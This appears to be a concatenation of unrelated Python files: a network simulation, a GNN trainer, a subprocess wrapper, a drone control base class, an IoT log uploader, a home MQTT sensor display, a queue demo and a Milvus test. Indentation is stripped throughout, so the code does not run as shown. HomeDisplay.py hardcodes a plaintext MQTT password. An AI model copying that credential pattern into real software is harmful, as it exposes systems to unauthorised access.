thread_L.append(threading.Thread(name=client.__str__(), target=client.run))
thread_L.append(threading.Thread(name=server.__str__(), target=server.run))
thread_L.append(threading.Thread(name=router_a.__str__(), target=router_a.run))
thread_L.append(threading.Thread(name="Network", target=link_layer.run))
for t in thread_L:
t.start()
#create some send events
for i in range(3):
client.udt_send(2, 'Sample data %d, Sample data, Sample data, Sample data, Sample data, Sample data, Sample data' % i)
#client.udt_send(2, 'Sample data %d, Sample data, Sample data, Sample data' % i)
#give the network sufficient time to transfer all packets before quitting
sleep(simulation_time)
#join all threads
for o in object_L:
o.stop = True
for t in thread_L:
t.join()
print("All simulation threads joined")
# writes to host periodically
|
neural_network_qpred.py
|
#!/usr/bin/env python3
"""
Copyright (c) 2019 Fabien Geyer
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import os
import re
import sys
import glob
import gzip
import json
import tarfile
import argparse
import numpy as np
import networkx as nx
import multiprocess as mp
from tqdm import tqdm, trange
import torch
import torch.nn as nn
import torch_geometric.nn as gnn
from torch_geometric.data import Data, DataLoader
sys.path.insert(0, 'P-Rex')
from prex.prnml import xml
from graph_transformation import mpls2graph, NodeType
class GNNModel(gnn.MessagePassing):
def __init__(self, num_features, num_classes, args):
super(GNNModel, self).__init__()
# First layers
self.fci = nn.Sequential(*[
nn.Linear(num_features, args.hidden_size),
nn.LeakyReLU(),
nn.Dropout(args.dropout),
])
self.cell = gnn.GatedGraphConv(args.hidden_size, args.nunroll)
# Final layers
self.fco = nn.Sequential(*[
nn.Linear(args.hidden_size, args.hidden_size),
nn.LeakyReLU(),
nn.Dropout(args.dropout),
nn.Linear(args.hidden_size, num_classes),
])
def forward(self, data):
x = self.fci(data.x)
x = self.cell(x, data.edge_index)
x = self.fco(x)
return x
def graph2torch(G):
"""
Transforms a networkx graph generated by `mpls2graph` to its matrix representation.
Returns a torch_geometric.data.Data object
"""
# Unique id for each node in the graph
ids = dict(zip(G.nodes(), range(G.number_of_nodes())))
# Node features
x = torch.zeros((G.number_of_nodes(), len(NodeType)))
# Label corresponds here to the prediction of the query output
y = torch.zeros(G.number_of_nodes(), dtype=torch.int64)
# Mask used for selecting the query node in the loss function.
# See torch.index_select(...) in training function
mask = torch.zeros(G.number_of_nodes(), dtype=torch.bool)
for node, data in G.nodes(data=True):
nid = ids[node]
x[nid, data["ntype"] - 1] = 1 # One-hot encoding of node type
if "pred" in data:
y[nid] = data["pred"]
mask[nid] = True
edge_index = torch.zeros((2, G.number_of_edges() * 2), dtype=torch.int64)
i = 0
for src, dst in G.edges():
# Each edge from the undirected graph G is encoded as two directed edges
edge_index[0, i] = ids[src]
edge_index[1, i] = ids[dst]
i += 1
edge_index[0, i] = ids[dst]
edge_index[1, i] = ids[src]
i += 1
return Data(x=x, edge_index=edge_index, y=y, mask=mask)
def graph2torch_worker(networks, qwork, qresults):
while True:
query = qwork.get()
if query is None:
break
q, k = re.search(r"^(.+)\s([0-9]+)$", query["query"]).groups()
G = mpls2graph(networks[query["network"]], q, int(k))
G.nodes[NodeType.Query]["pred"] = query["query_result"]
data = graph2torch(G)
qresults.put(data)
def prepare_dataset(args, netfiles, tqdm_desc):
dataset = []
mgr = mp.Manager()
qwork = mgr.Queue()
qresults = mgr.Queue()
for netfile in tqdm(netfiles, ncols=0, desc=tqdm_desc):
# First parse the tar file and the networks it contains
tar = tarfile.open(netfile, "r")
networks = {}
network_names = set(map(lambda n: os.path.split(n)[0], tar.getnames()))
for name in tqdm(network_names, desc="Parse networks", ncols=0, leave=False):
topo = tar.extractfile(os.path.join(name, "topo.xml"))
routing = tar.extractfile(os.path.join(name, "routing.xml"))
networks[name] = xml.read_network(topo, routing)
topo.close()
routing.close()
tar.close()
# Start workers for processing and building the graphs in parallel
workers = []
for _ in range(mp.cpu_count()):
worker = mp.Process(target=graph2torch_worker, args=(networks, qwork, qresults))
worker.start()
workers.append(worker)
# Parse queries and their results
jsonfile = netfile.replace(".xmls.tgz", ".queries.json.gz")
with open(jsonfile, "r") as f:
queries = json.load(f)
# Push queries to workers
nqueries = 0
for query in queries:
qwork.put(query)
nqueries += 1
# Send None to notify workers that there's no more work
for _ in range(len(workers)):
qwork.put(None)
for _ in trange(nqueries, ncols=0, desc="Build graphs", leave=False):
dataset.append(qresults.get())
# Shutdown workers
for worker in workers:
worker.join()
mgr.shutdown()
return dataset
def main(args):
# Initialize random seeds
np.random.seed(args.seed)
torch.manual_seed(args.seed)
# Find dataset files and split them in train and eval
netfiles = sorted(glob.glob(args.dataset_path))
if args.nnetworks < 2:
netfiles = np.array(netfiles)
else:
netfiles = np.array(netfiles[:args.nnetworks])
train_mask = np.random.rand(len(netfiles)) < args.train_test_split
if np.all(train_mask):
# Make sure that we have at least one dataset for evaluation
train_mask[np.random.randint(len(netfiles))] = False
# Parse dataset and transforms it to graph objects
dataset_train = prepare_dataset(args, netfiles[train_mask], "Build train dataset")
dataset_eval = prepare_dataset(args, netfiles[~train_mask], "Build eval dataset")
loader_train = DataLoader(dataset_train, batch_size=args.batch_size)
loader_eval = DataLoader(dataset_eval, batch_size=args.batch_size)
print(f"Dataset size: train={len(dataset_train)} eval={len(dataset_eval)}")
if args.cpu:
device = torch.device("cpu")
else:
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
torch.cuda.manual_seed(args.seed)
# Initialize model
model = GNNModel(len(NodeType), 2, args)
model = model.to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)
criterion = nn.CrossEntropyLoss()
# Main loop
for epoch in trange(args.epochs, ncols=0):
losses_train = []
metrics_train = []
metrics_eval = []
# Train model on training data
model.train()
for data in loader_train:
optimizer.zero_grad()
output = model(data.to(device))
# Select only the relevant nodes for the loss function
idxmask = torch.where(data.mask)[0]
mlabels = torch.index_select(data.y, 0, idxmask)
moutput = torch.index_select(output, 0, idxmask)
loss = criterion(moutput, mlabels)
losses_train.append(loss.item())
loss.backward()
optimizer.step()
choices = torch.argmax(moutput, axis=1)
metric = choices == mlabels
metrics_train.extend(metric.tolist())
# Use model on eval data
model.eval()
for data in loader_eval:
with torch.no_grad():
output = model(data.to(device))
idxmask = torch.where(data.mask)[0]
mlabels = torch.index_select(data.y, 0, idxmask)
moutput = torch.index_select(output, 0, idxmask)
choices = torch.argmax(moutput, axis=1)
metric = choices == mlabels
metrics_eval.extend(metric.tolist())
tqdm.write(f"{epoch:3d} | loss={np.mean(losses_train):.2e} metric={np.mean(metrics_train)*100:.2f} | test={np.mean(metrics_eval)*100:.2f}")
if __name__ == "__main__":
p = argparse.ArgumentParser()
p.add_argument("--seed", type=int, default=1, help="Seed used for random number generator")
p.add_argument("--dataset-path", type=str, default="dataset-networking2019/dataset/qpred/*/*.xmls.tgz")
p.add_argument("--nnetworks", type=int, default=0, help="Number of networks to load (0=all)")
p.add_argument("--epochs", type=int, default=15, help="Number of epochs for training")
p.add_argument("--learning-rate", type=float, default=5e-4, help="Learning rate for Adam")
p.add_argument("--dropout", type=float, default=.5, help="Dropout used for between the linear layers")
p.add_argument("--train-test-split", type=float, default=.75)
p.add_argument("--batch-size", type=int, default=16, help="Batch size")
p.add_argument("--hidden-size", type=int, default=64, help="Size of the hidden messages")
p.add_argument("--nunroll", type=int, default=10, help="Number of loop unrolling for the Gated Graph NN")
p.add_argument("--cpu", action="store_true", help="Disable use of GPU")
args = p.parse_args()
main(args)
|
console.py
|
'''
:File: console.py
:Author: Jayesh Joshi
:Email: jayeshjo1@utexas.edu
'''
from subprocess import Popen, PIPE, STDOUT
from threading import Thread
from queue import Queue
from ._decorators import timeout
from .exceptions import ConsoleExecTimeout
class ConsoleExecutor():
'''
Simple wrapper around subprocess to provide a non-blocking read from
stdout and stderr. This executor will start the subprocess using
universal_newlines=True, shell=False, and start_new_session=True to provide
the most responsive and proper executor. If the user specifies any kwargs
that should be sent to Popen, then they can override these settings.
This subprocess will start as the class is initialized and the class will
start a background thread that continually reads the output from the
executor. This way, if the user wants to read the output, we can simply
check to see if the background thread has done anything by timing out this
main thread and allowing the background thread to do its job. This also
allows users to timeout any read requests if user just wants to check if
there are any output.
This class also provides other interactive means to communicate with the
subprocess such as sending input and terminating.
'''
def __init__(self, cmd, **kwargs):
self._cmd = cmd
if(kwargs):
self.__popen = Popen(cmd, stdout=PIPE, stderr=STDOUT, stdin=PIPE, **kwargs)
else:
self.__popen = Popen(cmd, stdout=PIPE, stderr=STDOUT, stdin=PIPE, universal_newlines=True, shell=False,
start_new_session=True)
self.__queue = Queue()
self.__bg_worker = Thread(target=ConsoleExecutor.__file_reader, args=(self.__queue, self.__popen.stdout),
daemon=True)
self.__bg_worker.start()
self._alive = True
@property
def cmd(self):
'''
Command linked to this executor.
:getter: (int command that is being executed.
'''
return self._cmd
@property
def returncode(self):
'''
Exit code from the subprocess. Only set once the subprocess has exited.
:getter: (int) any exit code from process
'''
return self.__popen.returncode
@property
def alive(self):
'''
Determines if the subprocess is still alive or not. The background
thread used to read in any output from the subprocess will have exited
once the subprocess has completed.
:getter: (bool) True if subprocess is still alive. False if completed or
exited otherways.
'''
return self.__bg_worker.is_alive()
@property
def empty(self):
'''
Determines if there is no more output left in the bg executor.
:getter: (bool) True if no more output. False otherwise
'''
return self.__queue.empty()
def read_output(self, timeout=None):
'''
Reads the next output from the subprocess. These must be sent by flushed
stdout or stderr.
By default, this method will poll forever until the subprocess has
passed any output. Users can define timeout to wait only a specific
amount of time for the next output.
:param timeout: Amount of time in seconds to wait for the next output.
:type timeout: int
:returns: Output read from the subprocess. This value will be None if
the subprocess has exited.
:raises ConsoleExecTimeout: If user specifies a non-None/non-Negative
timeout and subprocess has not responded in time.
'''
if(not(self.__queue.empty())):
return self.__queue.get()
while(True):
if(self.alive):
self.__poll_queue(timeout=timeout, exception=ConsoleExecTimeout)
if(self.__queue.empty()):
if(not(self.alive)):
self.__popen.wait()
if(not(self.__queue.empty())):
return self.__queue.get()
return None
else:
return self.__queue.get() # should never halt here...
else:
self.__popen.wait()
if(not(self.__queue.empty())):
return self.__queue.get()
return None
def send_input(self, value, new_line=True):
'''
Allows users to send input to the subprocess. This input will be flushed
into the subprocess to ensure that the input will be read. To acheive
this, this method will automatically add an extra new line if the user
hasn't specified a new line. This automatic behavior can be disabled by
optional user input new_line
:param value: Message to send to the subprocess.
:type value: str
:param new_line: True if method should add a new line if missing. False
to ignore this feature.
:type new_line: bool
'''
if(self.alive):
self.__popen.stdin.write(value + "\n" if value[:-1] != "\n" and new_line else value)
self.__popen.stdin.flush()
def kill(self):
'''
Terminates the subprocess and waits for it to exit gracefully. Currently
this will not stop any child processes spawned by our subprocess.
'''
self.__popen.terminate()
self.__popen.wait()
def close(self):
'''
Closes off any FDs open by this class to properly clear any memory used
by this subprocess. Terminates subprocess if alive.
'''
if(self.alive):
self.kill()
self.__bg_worker.join()
self.__popen.wait()
self.__popen.stdin.close()
self.__popen.stdout.close()
@timeout(name="Polling Subprocess")
def __poll_queue(self, **kwargs):
while(self.__queue.empty() and self.__bg_worker.is_alive()):
yield None
def __file_reader(queue, file):
for line in iter(file.readline, b'' or ''):
queue.put(line)
file.close()
|
splash.py
|
import time
import tkinter as tk
from multiprocessing import Process
from PIL import Image, ImageTk
from fishy.helper import helper
from fishy.helper.config import config
def show(win_loc):
dim = (300, 200)
top = tk.Tk()
top.overrideredirect(True)
top.lift()
top.title("Loading...")
top.resizable(False, False)
top.iconbitmap(helper.manifest_file('icon.ico'))
canvas = tk.Canvas(top, width=dim[0], height=dim[1], bg='white')
canvas.pack()
top.image = Image.open(helper.manifest_file('fishybot_logo.png')).resize(dim)
top.image = ImageTk.PhotoImage(top.image)
canvas.create_image(0, 0, anchor=tk.NW, image=top.image)
# Position splash at the center of the main window
default_loc = (str(top.winfo_reqwidth()) + "+" + str(top.winfo_reqheight()) + "+" + "0" + "0")
loc = (win_loc or default_loc).split("+")[1:]
top.geometry("{}x{}+{}+{}".format(dim[0], dim[1], int(loc[0]) + int(dim[0] / 2), int(loc[1]) + int(dim[1] / 2)))
top.update()
time.sleep(3)
top.destroy()
def start():
Process(target=show, args=(config.get("win_loc"),)).start()
|
student_base.py
|
##################################################################
# Copyright 2021 Lockheed Martin Corporation. #
# Use of this software is subject to the BSD 3-Clause License. #
##################################################################
# Student flight control base class
#
# This class does the following:
# - receives aircraft data from MavLink
# - forwards that data directly to the Visualization system for display
# - also forwards that data to the student's derived class
# - defines methods that the student's derived class can call to tell the drone to do things
#
# The vizualization communications, Mavlink communications, and student code are all in seperate threads.
import sys
sys.path.append('Visualizer/')
import time
import grpc
import viz_pb2 as viz_connect
import viz_pb2_grpc as viz_connect_grpc
import threading
import mavsdk
import asyncio
import navpy
from shapely.geometry import shape
import os
import json
import math
class student_base:
def __init__(self):
self.channel = grpc.insecure_channel('localhost:51052')
self.stub = viz_connect_grpc.Momentum22VizStub(self.channel)
self.time = 0
self.msgId = 0
self.in_air_lp = False
self.home_alt = 0
self.telemetry = {}
self.telemetry['altitude'] = 0
self.telemetry['latitude'] = 0
self.telemetry['longitude'] = 0
self.telemetry['in_air'] = False
self.telemetry['water_pct_remaining'] = 0
self.telemetry['fires_pct_remaining'] = 100
self.telemetry['fire_polygons'] = []
self.telemetry['survivors_found'] = 0
self.telemetry['velocity'] = 0
self.commands = {}
self.commands['arm'] = False
self.commands['takeoff'] = False
self.commands['land'] = False
self.commands['disarm'] = False
self.commands['goto'] = False
self.mav_shutdown = False
self.viz_stopping = False
self.viz_thread = None
self.student_thread = None
######### Interface for the Viz Thread ###########
def viz_thread_start(self):
self.viz_thread = threading.Thread(target=self.viz_thread_main, args=(self,))
self.viz_thread.start();
def viz_thread_stop(self):
self.viz_stopping = True
self.viz_thread.join()
######### Implementation for the Viz Thread ###########
def viz_thread_main(self, args):
while not self.viz_stopping:
self.viz_send_updates()
self.viz_read_viz_data()
time.sleep(0.1)
def viz_send_updates(self):
self.time = int(time.time()*1000.0)
if(self.telemetry['in_air']):
self.viz_send_location(self.telemetry['latitude'], self.telemetry['longitude'])
self.viz_send_ground_state(self.telemetry['in_air'])
self.new_data_set = False
def viz_send_location(self, latitude, longitude):
loc = viz_connect.Location(msgId=self.msgId, latitude=latitude, longitude=longitude, time=self.time)
self.msgId += 1
ack = self.stub.SetDroneLocation(loc)
def viz_send_ground_state(self, in_air):
if in_air != self.in_air_lp:
self.in_air_lp = in_air
if in_air:
tn = viz_connect.TakeoffNotification(msgId=self.msgId, isTakenOff=True, time=self.time)
ack = self.stub.SetTakeoffStatus(tn)
if not in_air:
ln = viz_connect.LandingNotification(msgId=self.msgId, isLanded=True, time=self.time)
ack = self.stub.SetLandingStatus(ln)
self.msgId += 1
def viz_read_viz_data(self):
try:
if(os.path.getsize('.temp/sim_data.json') > 15 and os.path.isfile('.temp/sim_data.json')):
with open('.temp/sim_data.json', 'r', encoding='utf-8', errors='ignore') as f:
data = json.load(f)
if ("water_pct_remaining" in data):
self.telemetry['water_pct_remaining'] = data['water_pct_remaining']
if ("fires_pct_remaining" in data):
self.telemetry['fires_pct_remaining'] = data['fires_pct_remaining']
if ("fire_polygons" in data):
self.telemetry['fire_polygons'] = [shape(poly) for poly in data['fire_polygons']]
if ("survivors_found" in data):
self.telemetry['survivors_found'] = data['survivors_found']
except json.decoder.JSONDecodeError:
# print("json error")
pass
######### MAV Interface ###########
def mav_run(self):
asyncio.ensure_future(self.mav_start())
asyncio.get_event_loop().run_forever()
async def mav_start(self):
self.drone = mavsdk.System()
await self.drone.connect()
asyncio.ensure_future(self.mav_in_air(self.drone))
asyncio.ensure_future(self.mav_position(self.drone))
asyncio.ensure_future(self.mav_velocity(self.drone))
asyncio.ensure_future(self.mav_shutdown_watcher())
asyncio.ensure_future(self.mav_command_watcher(self.drone))
def mav_thread_stop(self):
self.mav_shutdown = True
async def mav_shutdown_watcher(self):
while not self.mav_shutdown:
await asyncio.sleep(0.1)
asyncio.get_event_loop().stop()
async def mav_in_air(self, drone):
async for in_air in drone.telemetry.in_air():
self.telemetry['in_air'] = in_air
async def mav_position(self, drone):
async for position in drone.telemetry.position():
self.telemetry['latitude'] = position.latitude_deg
self.telemetry['longitude'] = position.longitude_deg
self.telemetry['altitude'] = position.relative_altitude_m
self.home_alt = position.absolute_altitude_m - position.relative_altitude_m
async def mav_velocity(self, drone):
async for pv in drone.telemetry.position_velocity_ned():
self.telemetry['velocity'] = math.sqrt(pv.velocity.north_m_s**2 + pv.velocity.east_m_s**2)
async def mav_command_watcher(self, drone):
while not self.mav_shutdown:
if self.commands['arm']:
await drone.action.arm()
self.commands['arm'] = False
if self.commands['disarm']:
await drone.action.disarm()
self.commands['disarm'] = False
if self.commands['takeoff']:
await drone.action.takeoff()
self.commands['takeoff'] = False
if self.commands['land']:
await drone.action.land()
self.commands['land'] = False
if self.commands['goto']:
lat, lon, alt = self.commands['goto']
await drone.action.goto_location(lat, lon, alt + self.home_alt, 0)
self.commands['goto'] = False
await asyncio.sleep(0.01)
########## Student Thread Interface ############
def student_thread_start(self):
self.student_thread = threading.Thread(target=self.student_thread_main, args=(self,))
self.student_thread.start();
def student_thread_wait_for_stop(self):
self.student_thread.join()
def student_thread_main(self, args):
time.sleep(1)
self.student_run(self.telemetry, self.commands)
self.mav_thread_stop()
def student_run(self, telemetry, commands):
print("Override this method in your class!")
############# Student Commands ###############
def arm(self):
self.commands['arm'] = True
while self.commands['arm']:
time.sleep(0.01)
def disarm(self):
self.commands['disarm'] = True
while self.commands['disarm']:
time.sleep(0.01)
def takeoff(self):
self.commands['takeoff'] = True
while self.commands['takeoff']:
time.sleep(0.01)
def land(self):
self.commands['land'] = True
while self.commands['land']:
time.sleep(0.01)
def goto(self, lat, lon, alt):
self.commands['goto'] = (lat, lon, alt)
while self.commands['goto']:
time.sleep(0.01)
########## Main ############
def run(self):
self.viz_thread_start()
self.student_thread_start()
self.mav_run()
self.student_thread_wait_for_stop()
self.viz_thread_stop()
if __name__ == "__main__":
print("This script can't be run directly. Create a class that inherits student_base, and run that instead.")
|
logger.py
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
import threading
import json
import logging
import app.util as util
IOT_BASE_TOPIC = 'edge-manager-app'
class Logger(object):
def __init__(self, device_name, iot_params):
'''
This class is responsible for sending application logs
to the cloud via MQTT and IoT Topics
'''
self.device_name = device_name
logging.info("Device Name: %s" % self.device_name)
self.iot_params = iot_params
self.__update_credentials()
self.logs_buffer = []
self.__log_lock = threading.Lock()
def __update_credentials(self):
'''
Get new temp credentials
'''
logging.info("Getting the IoT Credentials")
self.iot_data_client = util.get_client('iot-data', self.iot_params)
def __run_logs_upload_job__(self):
'''
Launch a thread that will read the logs buffer
prepare a json document and send the logs
'''
self.cloud_log_sync_job = threading.Thread(target=self.__upload_logs__)
self.cloud_log_sync_job.start()
def __upload_logs__(self):
'''
Invoked by the thread to publish the latest logs
'''
self.__log_lock.acquire(True)
f = json.dumps({'logs': self.logs_buffer})
self.logs_buffer = [] # clean the buffer
try:
self.iot_data_client.publish( topic='%s/logs/%s' % (IOT_BASE_TOPIC, self.device_name), payload=f.encode('utf-8') )
except Exception as e:
logging.error(e)
self.__update_credentials()
self.iot_data_client.publish( topic='%s/logs/%s' % (IOT_BASE_TOPIC, self.device_name), payload=f.encode('utf-8') )
logging.info("New log file uploaded. len: %d" % len(f))
self.__log_lock.release()
def publish_logs(self, data):
'''
Invoked by the application, it buffers the logs
'''
buffer_len = 0
if self.__log_lock.acquire(False):
self.logs_buffer.append(data)
buffer_len = len(self.logs_buffer)
self.__log_lock.release()
# else: job is running, discard the new data
if buffer_len > 10:
# run the sync job
self.__run_logs_upload_job__()
|
HomeDisplay.py
|
# pv display for Pi0 using python3 and PySimpleGUI
import time
from time import ctime
from datetime import datetime
import pytz
import json
import paho.mqtt.client as mqtt
import threading
PVB_Vin = ' 00.0'
PVB_Vout = ' 00.0'
PVB_Iin = ' 00.00'
PVB_Iout = ' 00.00'
S2_temp = ' 00.0'
S2_hum = ' 00.0'
S2_atmp = ' 0000.0'
S2_vols = ' 000.0'
S3_temp = ' 00.0'
S3_hum = ' 00.0'
S3_atmp = ' 0000.0'
S4_temp = ' 00.0'
S4_hum = ' 00.0'
PM25 = ' 000.0'
PM10 = ' 000.0'
Msg = ' '
ptz = pytz.timezone('America/Los_Angeles')
utc = pytz.timezone('UTC')
now = utc.localize(datetime.utcnow())
Time = str(now.astimezone(ptz))[:-13]
import PySimpleGUI as sg
sg.theme('DarkAmber') # Add a little color to your windows
sg.set_options(font=('Helvetica', 14))
#
layout = [ [sg.Text(Time, key='-time-')],
[sg.Text('PvB Vi/o:'), sg.Text(PVB_Vin, key='-PVB_Vin-'),
sg.Text('/'), sg.Text(PVB_Vout, key='-PVB_Vout-'),
sg.Text(' Ii/o:'), sg.Text(PVB_Iin, key='-PVB_Iin-'),
sg.Text('/'), sg.Text(PVB_Iout, key='-PVB_Iout-')],
[sg.Text('S2 T:'), sg.Text(S2_temp, key='-S2_temp-'),
sg.Text(' H:'), sg.Text(S2_hum, key='-S2_hum-'),
sg.Text(' P:'), sg.Text(S2_atmp, key='-S2_atmp-'),
sg.Text(' V:'), sg.Text(S2_vols, key='-S2_vols-')],
[sg.Text('S3 T:'), sg.Text(S3_temp, key='-S3_temp-'),
sg.Text(' H:'), sg.Text(S3_hum, key='-S3_hum-'),
sg.Text(' P:'), sg.Text(S3_atmp, key='-S3_atmp-')],
[sg.Text('S4 T:'), sg.Text(S4_temp, key='-S4_temp-'),
sg.Text(' H:'), sg.Text(S4_hum, key='-S4_hum-')],
[sg.Text('PM2.5:'), sg.Text(PM25, key='-PM25-'),
sg.Text(' PM10:'), sg.Text(PM10, key='-PM10-')],
[sg.Button('0', key='-SP100-'), sg.Text(' '),
sg.Button('1', key='-SP101-'), sg.Text(' '),
sg.Button('2', key='-SP102-'), sg.Text(' '),
sg.Button('3', key='-SP103-')]
]
# Create the Window
window = sg.Window('PV Monitor', layout, no_titlebar=False)
def new_measurement(client, userdata, msg):
#print (msg.topic, msg.payload)
now = utc.localize(datetime.utcnow())
Time = str(now.astimezone(ptz))[:-13]
topic = msg.topic
if 'pv/battery' in topic:
try:
measurement = json.loads(msg.payload)
except:
return
#print(topic, measurement)
window['-time-'].update(Time)
if 'output' in topic:
if 'current' in topic:
PVB_Iout = " {0:5.2f}".format(measurement)
window['-PVB_Iout-'].update(PVB_Iout)
else:
PVB_Vout = " {0:5.2f}".format(measurement)
window['-PVB_Vout-'].update(PVB_Vout)
elif 'input' in topic:
if 'current' in topic:
PVB_Iin = " {0:5.2f}".format(measurement)
window['-PVB_Iin-'].update(PVB_Iin)
else:
PVB_Vin = " {0:5.2f}".format(measurement)
window['-PVB_Vin-'].update(PVB_Vin)
elif 'home' in topic:
tags = topic.split('/')
measure = tags[2]
try:
measurement = json.loads(msg.payload)
except:
return
value = measurement['value']
if tags[1] == 'sensor2':
if measure == 'tmp':
S2_temp = " {0:5.2f}".format(value*9/5+32)
window['-S2_temp-'].update(S2_temp)
elif measure == 'hum':
S2_hum = " {0:5.2f}".format(value)
window['-S2_hum-'].update(S2_hum)
elif measure == 'atmp':
S2_atmp = " {0:5.1f}".format(value)
window['-S2_atmp-'].update(S2_atmp)
elif measure == 'vols':
S2_vols = " {0:5.1f}".format(value/1000.0)
window['-S2_vols-'].update(S2_vols)
if tags[1] == 'sensor3':
if measure == 'tmp':
S3_temp = " {0:5.2f}".format(value*9/5+32)
window['-S3_temp-'].update(S3_temp)
elif measure == 'hum':
S3_hum = " {0:5.1f}".format(value)
window['-S3_hum-'].update(S3_hum)
elif measure == 'atmp':
S3_atmp = " {0:5.1f}".format(value)
window['-S3_atmp-'].update(S3_atmp)
if tags[1] == 'sensor4':
if measure == 'tmp':
S4_temp = " {0:5.2f}".format(value*9/5+32)
window['-S4_temp-'].update(S4_temp)
elif measure == 'hum':
S4_hum = " {0:5.1f}".format(value)
window['-S4_hum-'].update(S4_hum)
elif topic == 'tele/sds011/SENSOR':
try:
measurement = json.loads(msg.payload)
except:
return
pm25_val = measurement['SDS0X1']['PM2.5']
pm10_val = measurement['SDS0X1']['PM10']
PM25= " {0:6.1f}".format(pm25_val)
window['-PM25-'].update(PM25)
PM10 = " {0:6.1f}".format(pm10_val)
window['-PM10-'].update(PM10)
elif 'stat/SP10' in topic:
start = topic.index("SP10")
id = topic[start:start+5]
#print(topic, id, msg.payload)
if 'POWER' in topic:
try:
status = msg.payload
if status == b'ON':
window['-'+id+'-'].update(button_color=('black', 'green'))
elif status == b'OFF':
window['-'+id+'-'].update(button_color=('white', 'grey'))
except:
print("failure reading/setting button status")
return
else:
print('unknown: ', topic)
def subscribe(client):
client.subscribe('pv/battery/output/voltage')
client.subscribe("pv/battery/output/current")
client.subscribe('pv/battery/input/voltage')
client.subscribe("pv/battery/input/current")
client.subscribe('home/#')
client.subscribe('tele/sds011/#')
client.subscribe('stat/SP101/#')
client.subscribe('stat/SP102/#')
client.subscribe('stat/SP103/#')
client.subscribe('stat/SP104/#')
# start mqtt client
def on_connect(client, userdata, flags, rc):
if rc == 0:
subscribe(client)
#window['-msg-'].update("MQTT connected")
print("MQTT connect success")
else:
print(f"MQTT connect fail with code {rc}")
def on_disconnect(client, userdata, rc):
#window['-msg-'].update("MQTT connection lost")
connected = False
while connected == False:
try:
client.reconnect()
connected = True
except:
pass
subscribe(client)
def PSGEvents():
while True:
event, values = window.read()
if event in (sg.WIN_CLOSED, 'Cancel'):
break
if 'SW' in event:
btn_id=int(event[2])
print(event)
if btn_id >= 0 and btn_id < 4:
client.publish('cmnd/SP10'+str(btn_id)+'/POWER', 'OFF')
window.close()
def MQTT_Msgs():
time.sleep(1)
client.loop_start()
time.sleep(1)
while True:
try:
client.publish('cmnd/SP101/Power')
client.publish('cmnd/SP102/Power')
client.publish('cmnd/SP103/Power')
client.publish('cmnd/SP104/Power')
except BaseException as e:
print ("exception asking for SP10x Power status", e)
time.sleep(600) # query every 10 min
t1 = threading.Thread(target=PSGEvents)
t1.start()
time.sleep(4) # allow window to be created
print("New MQT session being set up")
client = mqtt.Client()
client.on_connect = on_connect
client.on_disconnect = on_disconnect
client.on_message = new_measurement
client.username_pw_set(username='mosq', password='1947nw')
client.connect("192.168.1.101", 1883, 60)
t2 = threading.Thread(target=MQTT_Msgs)
t2.start()
|
queue_test.py
|
#!/usr/bin/env python
"生产者和消费者线程与共享队列进行通信"
import threading
import time
import queue
NUM_CONSUMERS_INT = 2 # 消费者线程数目
NUM_PRODUCERS_INT = 4 # 生产者线程数目
NUM_MESSAGES_INT = 4 # 每个生产者存入的信息的数量
STDOUT_MUTEX = threading.Lock() # 否则打印操作可能会发生重叠
DATA_QUEUE = queue.Queue()
EXIT_LISTBOOL = [False for i_int in range(NUM_PRODUCERS_INT)] # 消费者线程退出的标志
def produser(id_int):
"生产者线程"
for i_message_num_int in range(NUM_MESSAGES_INT):
time.sleep(id_int + 1)
DATA_QUEUE.put(
'[producer id={}, count={}]'.format(id_int, i_message_num_int)
)
EXIT_LISTBOOL[id_int] = True
def consumer(id_int):
"消费者线程"
while not all(EXIT_LISTBOOL):
time.sleep(0.1314)
try:
data_str = DATA_QUEUE.get(block=False)
except queue.Empty:
pass
else:
with STDOUT_MUTEX:
print('consumer', id_int, '| got ->', data_str)
def main():
listThread = []
for i_id_int in range(NUM_CONSUMERS_INT):
Thread = threading.Thread(target=consumer, args=(i_id_int,))
listThread.append(Thread)
Thread.start()
for i_id_int in range(NUM_PRODUCERS_INT):
Thread = threading.Thread(target=produser, args=(i_id_int,))
listThread.append(Thread)
Thread.start()
for i_Thread in listThread:
i_Thread.join()
print('Main thread exiting...')
if __name__ == '__main__':
main()
|
test_search.py
|
import time
import pdb
import copy
import logging
from multiprocessing import Pool, Process
import pytest
import numpy as np
from milvus import DataType
from utils import *
from constants import *
uid = "test_search"
nq = 1
epsilon = 0.001
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
search_param = {"nprobe": 1}
entity = gen_entities(1, is_normal=True)
entities = gen_entities(default_nb, is_normal=True)
raw_vectors, binary_entities = gen_binary_entities(default_nb)
default_query, default_query_vecs = gen_query_vectors(field_name, entities, default_top_k, nq)
default_binary_query, default_binary_query_vecs = gen_query_vectors(binary_field_name, binary_entities, default_top_k,
nq)
def init_data(connect, collection, nb=3000, partition_tags=None, auto_id=True):
'''
Generate entities and add it in collection
'''
global entities
if nb == 3000:
insert_entities = entities
else:
insert_entities = gen_entities(nb, is_normal=True)
if partition_tags is None:
if auto_id:
ids = connect.insert(collection, insert_entities)
else:
ids = connect.insert(collection, insert_entities, ids=[i for i in range(nb)])
else:
if auto_id:
ids = connect.insert(collection, insert_entities, partition_tag=partition_tags)
else:
ids = connect.insert(collection, insert_entities, ids=[i for i in range(nb)], partition_tag=partition_tags)
connect.flush([collection])
return insert_entities, ids
